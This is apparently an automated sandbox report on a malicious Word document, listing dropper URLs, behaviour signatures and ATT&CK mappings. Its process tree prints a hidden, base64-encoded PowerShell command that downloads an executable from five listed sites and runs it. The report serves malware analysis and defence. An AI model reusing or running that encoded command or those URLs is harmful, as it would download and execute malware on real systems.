636cb7d54cf2c8300d17f9da505e644a920329a9b4b674f1b147825385551a68

General

Target

636cb7d54cf2c8300d17f9da505e644a920329a9b4b674f1b147825385551a68
Sample

191218-ab6gt2a1qe
SHA256

636cb7d54cf2c8300d17f9da505e644a920329a9b4b674f1b147825385551a68

Score

10^/10

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://biswascreation.com/jodp17ksjfs/1flxhgo/

exe.dropper

https://expoblockchain2020.com/cgi-bin/2/

exe.dropper

https://mag-flex.com/wp-admin/xf8q/

exe.dropper

https://www.harriscustomcatering.com/wp-includes/jCItk01ogb/

exe.dropper

https://fdigitalsolutions.com/cgi-bin/mzqjn4h/

Signatures

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
4880	WINWORD.EXE

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
4880	WINWORD.EXE

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
4880	WINWORD.EXE

Process spawned unexpected child process 1 IoCs

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3664	4980	Powershell.exe	73

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	3664	Powershell.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
3664	Powershell.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\636cb7d54cf2c8300d17f9da505e644a920329a9b4b674f1b147825385551a68.doc" /o ""
1⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of FindShellTrayWindow
PID:4880

C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
Powershell -w hidden -en JABTAGMAeQBvAHoAbQBmAHkAdAB6AD0AJwBYAGoAdABoAGgAaQBtAHUAZgBvAGEAJwA7ACQASgBxAHUAbQBoAGoAcwBqAGcAIAA9ACAAJwA2ADAAMwAnADsAJABRAHQAcgBqAHMAdwByAHIAZAB5AHgAPQAnAE0AeAB6AGoAaABpAHoAeABkACcAOwAkAFYAYQB2AGQAaAB6AGQAeQA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQASgBxAHUAbQBoAGoAcwBqAGcAKwAnAC4AZQB4AGUAJwA7ACQASwBiAHQAaQBnAGQAYwBpAD0AJwBWAGwAZwBqAGcAZAB5AGYAZgB2ACcAOwAkAEoAaQB3AGcAawBwAGgAegB2AGIAZAA9ACYAKAAnAG4AJwArACcAZQB3AC0AbwBiAGoAZQBjACcAKwAnAHQAJwApACAATgBlAFQALgB3AGUAQgBDAEwAaQBlAE4AdAA7ACQARQB0AGQAbABwAGwAeABkAD0AJwBoAHQAdABwAHMAOgAvAC8AYgBpAHMAdwBhAHMAYwByAGUAYQB0AGkAbwBuAC4AYwBvAG0ALwBqAG8AZABwADEANwBrAHMAagBmAHMALwAxAGYAbAB4AGgAZwBvAC8AKgBoAHQAdABwAHMAOgAvAC8AZQB4AHAAbwBiAGwAbwBjAGsAYwBoAGEAaQBuADIAMAAyADAALgBjAG8AbQAvAGMAZwBpAC0AYgBpAG4ALwAyAC8AKgBoAHQAdABwAHMAOgAvAC8AbQBhAGcALQBmAGwAZQB4AC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwB4AGYAOABxAC8AKgBoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBoAGEAcgByAGkAcwBjAHUAcwB0AG8AbQBjAGEAdABlAHIAaQBuAGcALgBjAG8AbQAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAGoAQwBJAHQAawAwADEAbwBnAGIALwAqAGgAdAB0AHAAcwA6AC8ALwBmAGQAaQBnAGkAdABhAGwAcwBvAGwAdQB0AGkAbwBuAHMALgBjAG8AbQAvAGMAZwBpAC0AYgBpAG4ALwBtAHoAcQBqAG4ANABoAC8AJwAuACIAUwBgAFAATABpAFQAIgAoACcAKgAnACkAOwAkAEEAYQB3AGYAZQBzAGcAYgB0AG4AZgBxAD0AJwBDAGoAbAB6AHcAcABhAHkAcQBtAHQAJwA7AGYAbwByAGUAYQBjAGgAKAAkAFkAcgBrAGQAYgBiAGMAYwBjACAAaQBuACAAJABFAHQAZABsAHAAbAB4AGQAKQB7AHQAcgB5AHsAJABKAGkAdwBnAGsAcABoAHoAdgBiAGQALgAiAEQAbwBgAHcATgBsAE8AYQBgAEQARgBpAEwARQAiACgAJABZAHIAawBkAGIAYgBjAGMAYwAsACAAJABWAGEAdgBkAGgAegBkAHkAKQA7ACQARQBiAHIAeAB0AHIAcgBiAD0AJwBBAHoAagBiAG0AcABpAGcAcQBrACcAOwBJAGYAIAAoACgALgAoACcARwBlACcAKwAnAHQALQBJACcAKwAnAHQAZQBtACcAKQAgACQAVgBhAHYAZABoAHoAZAB5ACkALgAiAGwAYABFAGAATgBHAHQAaAAiACAALQBnAGUAIAAzADIAOAA5ADkAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6ACIAUwBgAFQAYQByAHQAIgAoACQAVgBhAHYAZABoAHoAZAB5ACkAOwAkAFUAZgB6AHYAcwBjAGoAagBtAGUAcwA9ACcAQwBwAGwAeQBoAG8AaQB3AGsAYQBtAG4AbgAnADsAYgByAGUAYQBrADsAJABGAGMAcABqAGQAbAB3AHIAdQA9ACcAWgBrAGMAbwB1AHIAegBuAG4AdAB1AHIAZAAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABTAGsAZgBtAGgAZQB0AGIAZQBqAHAAaQA9ACcARgB4AHIAYwBoAHAAeQB1AHYAZwB2ACcA
1⤵
- Process spawned unexpected child process
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:3664

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads